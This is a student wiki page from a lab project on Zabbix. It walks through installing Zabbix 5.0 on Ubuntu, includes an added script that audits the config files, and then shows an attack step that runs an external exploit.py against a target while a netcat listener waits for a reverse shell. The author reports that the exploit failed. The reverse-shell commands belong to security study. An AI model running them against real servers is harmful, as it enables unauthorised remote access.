Project 1 ‐ Vulnerability Research (Zabbix) - FlameSpyro/Tech-Journal GitHub Wiki

Project 1 - Vulnerability Research (Zabbix)

  • Notice: My research and attempt at looking into and exploiting the Zabbix Server were unsuccessful. This guide explains the process of installing the newest version of Zabbix and running the exploit.
  • Video Demonstration

Zabbix Installation

Pre-requisites

  • An install of Ubuntu 20.04 (Focal)
  • Access to root user

Installation

  • Download the release package, install it, and then install the Zabbix packages:
wget https://repo.zabbix.com/zabbix/5.0/ubuntu/pool/main/z/zabbix-release/zabbix-release_5.0-1+focal_all.deb
dpkg -i zabbix-release_5.0-1+focal_all.deb
apt update
apt install zabbix-server-mysql zabbix-frontend-php zabbix-apache-conf zabbix-agent
  • Open MySQL, which was installed with the packages, and create a database and a user zabbix with a password of your choice:
mysql -uroot -p
password
mysql> create database zabbix character set utf8 collate utf8_bin;
mysql> create user zabbix@localhost identified by 'password';
mysql> grant all privileges on zabbix.* to zabbix@localhost;
mysql> set global log_bin_trust_function_creators = 1;
mysql> quit;
  • On the host, import the initial schema and data. This also prompts for the newly created password.
zcat /usr/share/doc/zabbix-server-mysql*/create.sql.gz | mysql -uzabbix -p zabbix
  • Disable log_bin_trust_function_creators option.
mysql -uroot -p
password
mysql> set global log_bin_trust_function_creators = 0;
mysql> quit;
  • Edit the /etc/zabbix/zabbix_server.conf to add a password for the zabbix user
sudo nano /etc/zabbix/zabbix_server.conf
# Uncomment near DBUser
DBPassword=password
  • Edit the /etc/zabbix/apache.conf and select a proper timezone
sudo nano /etc/zabbix/apache.conf
php_value date.timezone Europe/Riga
  • Restart the Zabbix server, agent and Apache, and enable them at boot
systemctl restart zabbix-server zabbix-agent apache2
systemctl enable zabbix-server zabbix-agent apache2
  • Finish the installation and log in
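
A post-install check for the configuration edits above, added here as an example (it is not part of the original wiki or of Zabbix): it flags an unset or placeholder DBPassword, a world-readable zabbix_server.conf, and a date.timezone line that is still commented out. The function names, the placeholder list and the 12-character minimum are assumptions of this example.

```sh
# Added example: audit the config edits from the install steps above.
# Function names, placeholder list and length threshold are this example's own.
# conf_value KEY FILE: last active (uncommented) KEY=value in a Zabbix conf file.
conf_value() { sed -n "s/^[[:space:]]*$1=//p" "$2" | tail -n 1; }

# check_db_password FILE: 0 = set, 1 = missing, 2 = placeholder or short.
# "password" is the value typed on this page; the other entries are assumed examples.
check_db_password() {
    _pw=$(conf_value DBPassword "$1")
    [ -n "$_pw" ] || { echo "FAIL: DBPassword is not set in $1"; return 1; }
    case "$_pw" in password|zabbix|changeme)
        echo "WARN: DBPassword in $1 is a placeholder value"; return 2 ;;
    esac
    [ "${#_pw}" -ge 12 ] || { echo "WARN: DBPassword is shorter than 12 characters"; return 2; }
    echo "OK: DBPassword is set"
}

# check_conf_mode FILE: the file stores the DB password in cleartext; 1 if others can read it.
check_conf_mode() {
    [ -f "$1" ] || { echo "FAIL: $1 not found"; return 1; }
    [ -z "$(find "$1" -maxdepth 0 -perm -004)" ] || { echo "FAIL: $1 is world-readable"; return 1; }
    echo "OK: $1 is not world-readable"
}

# check_timezone FILE: 0 if an uncommented php_value date.timezone line exists.
check_timezone() {
    grep -Eq '^[[:space:]]*php_value[[:space:]]+date\.timezone[[:space:]]+[^[:space:]]+' "$1" \
        && { echo "OK: date.timezone is set"; return 0; }
    echo "FAIL: date.timezone is still commented out in $1"; return 1
}

# audit_zabbix_install [SERVER_CONF] [APACHE_CONF]: exit status = number of findings.
audit_zabbix_install() {
    _n=0
    check_db_password "${1:-/etc/zabbix/zabbix_server.conf}" || _n=$((_n + 1))
    check_conf_mode   "${1:-/etc/zabbix/zabbix_server.conf}" || _n=$((_n + 1))
    check_timezone    "${2:-/etc/zabbix/apache.conf}"        || _n=$((_n + 1))
    return "$_n"
}

# demo: constructed sample files mirroring the values typed in the steps above.
demo() {
    _d=$(mktemp -d)
    printf 'DBUser=zabbix\nDBPassword=password\n' > "$_d/server.conf"; chmod 640 "$_d/server.conf"
    printf '# php_value date.timezone Europe/Riga\n' > "$_d/apache.conf"
    _rc=0; audit_zabbix_install "$_d/server.conf" "$_d/apache.conf" || _rc=$?
    rm -rf "$_d"; return "$_rc"
}
```

On a real install, source the file and call audit_zabbix_install with no arguments as root; it then reads the two /etc/zabbix paths used above.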

Attack script

  • On the attacker machine, download the exploit here
  • In another window open a netcat session
nc -nlvp 8888
  • On the original window
./exploit.py <target url> <username> <password> <attacker ip> <attacker port>

Troubleshooting

  • As the video demonstration explains, version 5.0.17 has proven extremely difficult to set up.
  • This installation installs 5.0.38, and the exploit does not work on this version.
  • The Zabbix repository has proven messy and unsuccessful for downloading Ubuntu and Debian packages.